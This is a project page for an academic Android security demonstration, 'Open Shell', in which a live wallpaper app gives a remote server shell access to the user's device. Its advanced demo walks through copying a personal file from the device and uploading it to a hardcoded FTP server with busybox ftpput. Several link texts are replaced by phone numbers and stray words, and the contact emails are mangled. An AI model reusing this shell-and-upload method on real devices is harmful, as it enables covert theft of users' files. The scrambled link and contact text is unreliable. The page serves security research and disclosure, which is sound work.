Open Shell
An exploit of user trust with an Android live wallpaper.

The basic premise is that users need to be wary of permissions when they install an application on Android.
We demonstrate how this trust can be violated by gaining shell access to the device and executing arbitrary commands.
One point of note is how full-network access permission is not required to send data to the Internet, only to receive it.
Even more notable is that this permission is almost entirely hidden in later versions of Android, belittling the risk.
The demo guide can be found below, along with the 2058062035

Demo

The first step is to install the app, which can be found under the downloads section.
Next, go to our demo 2159927397
You should see a dark grey page with a Terminal: SSH box in the middle. If the Terminal: SSH option doesn't appear, refresh the page. This can be a first-view issue.
Click on the Terminal: SSH box to start a new terminal. It will request the following information:
Host/IP: openshell.nextproject.ca Port: 2222 User: demo Password: demopassword
After entering all the info and logging in, go to your device settings, display and wallpapers, and set "Open Shell - Cube" as your wallpaper.
Setting the wallpaper establishes a connection with the server, and you viewing the wallpaper will show which port it has connected on.
To gain access to your session, type in the terminal screen -r followed by the port number shown on your screen, eg. screen -r 10000
You should now be connected to your device and see this indicated on the screen, meaning you're able to issue commands now!
Try entering ls to see if it's working. If a few files are listed, you're ready to go!
You now have shell access to your Android device. This isn't root access, but you still have a scary amount of power!
Feel free to poke around you device now if you're familiar with shell commands, but I'll give an example below.
If any of the commands seem to hang, try pressing Ctrl + C to abort it, or reconnecting to the site and resetting the wallpaper if disconnected.
To close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.

Demo (Advanced)

For a good example of how this could be used maliciously, the following guides you through uploading one of your files to our test FTP server.
To try this out, browse to some of your files, like in Download or DCIM/Camera, so try cd /sdcard/Download and then ls to find a file.
Once you have found a suitable file to transfer, we can move it to the app directory with cp FILENAME /data/data/com.nextproject.openshell/files
Now that it is in the app files, we can move back to that folder with cd /data/data/com.nextproject.openshell/files
Lastly, we use ./busybox ftpput -u ftpdemo -p ftppassword -P 2121 138.197.136.154 /files/FILENAME FILENAME
For those interested, more information on busybox can be xyletic
The version used in this app may be a little outdated depending on your time of viewing, but it still adds a lot of commands to our shell!
The file should now be located on the FTP server I set up for this demo, which you can check for youself with the same credentials.
Host/IP: openshell.nextproject.ca Port: 2121 User: ftpdemo Password: ftppassword
Use an FTP client like WinSCP, Filezilla, etc. to see the file with the above credentials, and delete it afterwards for your own privacy.
All uploaded files will be periodically removed at an indeterminate interval, but it's always good to be safe!
Beyond peeking at your files, the shell access can execute other commands, such as those exposed in the interfaces of other applications.
Again, to close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.

Developers

In the event that our server becomes overloaded with requests and the demo ceases to function, we invite you to try it yourself!
In the Downloads section to follow you will find the GitHub repositories for all of the code used for the website and app.
Detailed instructions and scripts are provided in these repositories and the site is Dockerized for easier deployment.
Should you find some addition that could be of benefit to either the site or the app, we would love to hear about it!
Please do not hesitate to create an issue/pull request on GitHub or contact us via email to discuss or improve Open Shell.

Downloads

Our app can be found on Google Play on supported devices:
(903) 964-7099
The APK file you have to install to your Android device to try out the demo can also be directly 210-484-1831
The formal research paper containing the theory and background behind this exploit can be downloaded here.
The GitHub page where the code for this site and the Docker containers used for the demo can be found here.
The GitHub page where the code for the Android app using Android Studio can be found here.

Citation

Please use the following reference in citing this research and application:

Mahmoud, Q.H., Kauling, D., and Zanin, S. “Hidden Android Permissions: Remote Code Execution and Shell Access using a Live Wallpaper"
In Proceedings of the 14th IEEE Annual Consumer Communications & Networking Conference (CCNC 2017), Las Vegas, NV, USA, Jan 2017, pp. 598-599.

Contact

This website and live demonstration was created by Dylan Kauling, but the concept is not mine!
The exploit/app was created by a student under the guidance of Dr. Qusay Mahmoud at UOIT.
If you have any questions about the concept and applications, contact Dr. Mahmoud - m@e@dnooma.comin.com
If you have any technical questions about the demo or are having troubles getting it working, feel free to shoot me an email! - m@e@dnooma.comin.com

Google Play and the Google Play logo are trademarks of Google Inc.